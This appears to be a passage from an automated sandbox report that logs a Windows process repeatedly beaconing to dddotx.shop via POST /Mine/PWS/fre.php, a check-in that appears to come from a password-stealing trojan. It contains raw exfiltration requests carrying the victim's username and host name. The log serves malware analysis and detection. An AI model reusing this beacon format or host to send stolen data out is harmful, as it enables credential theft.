Oct 24, 2024 17:03:26.405299902 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pEKBl8uyv2kO%2FbYI7NA7EdUYBqSfE7akentiVlZFbLsptxDfBEB%2FAAVmwQmk3r2QQd0IYJKiuhD401huKJ9RwIZcAftuMrnWdneAE7Kl%2B%2FNq7yjxbwIvWXHqTtscrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada7d3bca3ac4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50028	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:26.566142082 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:26.571665049 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:29.670588970 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEQo5emQw2osqdRyOMFO0Hdr%2Fx46iNWx6ruwmf%2FcWoBoGOXHQyaanl2vzOuhIyncfAmFvI5cOanErPFoHvNhwNh62Ar6KyjkcfRJvfvx4Oysm4nzrGPfPdoJvSqBLw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada8a6a234757-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1238&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50029	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:29.949460983 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:29.956285000 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:30.974685907 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53UoM9TZDZ5P4vSHYRHpQXGjB7ycjUl2WabI3sV5SzZifxyJ6fSV8B3znhxp%2BxFMUAEokx%2FtkiC80NrdZC0KuU%2BLLPcVAB72HjCa2v%2B2pOKp8I12CIVY6Pal2iAMBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada9f98eae96e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1401&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50030	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:31.126353025 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:31.134751081 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:32.096904039 CEST	777	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nIPXRH24tmkWLVMfYjNnVn7AP2DtbRqy8%2F9aCwnTmm6COYwuiN%2F6n5bJQEnJ7qi6L%2FlLTYiOqn%2BCE%2Btbbh1yyfharJrZvxVdQuCKwphs6itfy6Gr3O51rgyFMJ74RA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adaa71fe43ad0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1321&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=74&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50031	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:32.256139040 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:32.261893034 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:33.257147074 CEST	770	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OHuJdcwKj988xBjxnpLVZjMYvLyH1fDaGolI%2B7Qp3DWekDJug6sgjzSSudcwX2nE2EoWgx7BFZBiUdz2WND9wLIWmrGUuTjKQtPOig7dBAuota3lvqvGmlY2AiPQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adaadeb1ee926-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1106&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50032	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:33.459758997 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:33.465688944 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:34.906884909 CEST	782	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhJXDEKBhNkC%2Bgvm8EJsAvNS0%2FLPpSAwULwrWuA01NlXDJgqyDLZl88kGprTU8DOW5IfQGSHptGIhLrXQIMUtCysnlxF%2FRpMYbQhD%2FB6sDDEHh%2B%2FmrcNWF3A2sfA%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adab589bf478a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1290&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50033	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:35.053550005 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:35.059299946 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:36.731468916 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ec4v7cdsj9R7lJkSwshjm2sBzz0Yi3SqhlCd2dYWVSmxitBjtqDvl7McAuTUCe6SWa6zlUHaW3PBNhDVhPvAOko1%2BVHDFaKEbxEaLgB77mV%2Fk9D4fiUPkdtIIBygsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adabf6a15e82f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1457&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50034	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:36.881917953 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:36.887346983 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:38.767467022 CEST	780	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLaykezu7Zz0z2O%2FoypISLitca3YiOdR%2FRaPUBmpn10UxgXOQ2%2FEc1RI72cUF7DXb%2BsUDvZ%2BOQiibwkWN%2FQ8QvMxSJSxJX3keTyIBHxe1SLhp0js7Nga3F2nb5pbDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adacad8aaead9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1331&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50035	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:38.916393995 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:38.921832085 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:40.378551006 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aokre7JlNsIawmJyupBwGeDMFWPy9J4ZT2d4CbPbHagYmspz8noRggwSRTKFUu0yLZ73kcgkmvx4bs1Gvi9faLl6UYZJX3d%2B8oIYmzPS31LwB4HrPFyAlycRod0%2F%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adad7af6a4774-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50036	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:40.522819996 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:40.765352964 CEST	393	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:40.811482906 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:41.723603010 CEST	782	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUAhUd8ttVOU9iQmDkVjviHt%2FXF1690rNHiGhdwfbCrcYgX9qWBqhnqrF0%2BHt09zNJl3%2FK1%2Fasm2U4Es%2BWEIyfwDoGFLhnERXNZSKclB%2BV%2FuLd0oh0qHz2J5NvF3EQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adae38c226c3f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50037	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:41.877525091 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:41.883239985 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:43.222179890 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2YVYdYvB9Cb13Q13HoijNG2JbuyfazCk4JFPV1kmQvpO4WkAxyOO4fPGDk1%2FdhjdpqKmDR8RuFr1%2FYbEOJ5OGNlBdhxGTptsYtOfKOQz%2B1jerauTyU3M%2F6Yx%2BWbaw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adaea1916e77d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2687&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50038	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:43.370507002 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:43.376183987 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:44.266699076 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2F8Dg55V4vzwndC76cyd2AQMgBj4YbWMhYIa4bISoMztEWeC6XGX%2FQHuUNT3i9qjO9bB3pH8GYDx251YciV8YC6K8PqR4qMI9eksE%2FtLBLOfRY%2BZdRGNvclnJKWi3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adaf36fff3aac-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1141&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50039	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:44.471126080 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:44.476667881 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:45.899514914 CEST	780	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=arvzRh4D50zz0cGv9%2Fp%2B65cbO4r9XT4fD8aTYL0lC7SzW9RB66gozn8PE53drTYmJUetbJaDIWvGY%2BLR8BFosj%2B9QX%2BU1xUsMsoXmng%2B02C7nrK11RjLo1znHiXGCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7adafa5bf06c28-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1929&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50040	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:46.075936079 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:46.083585024 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
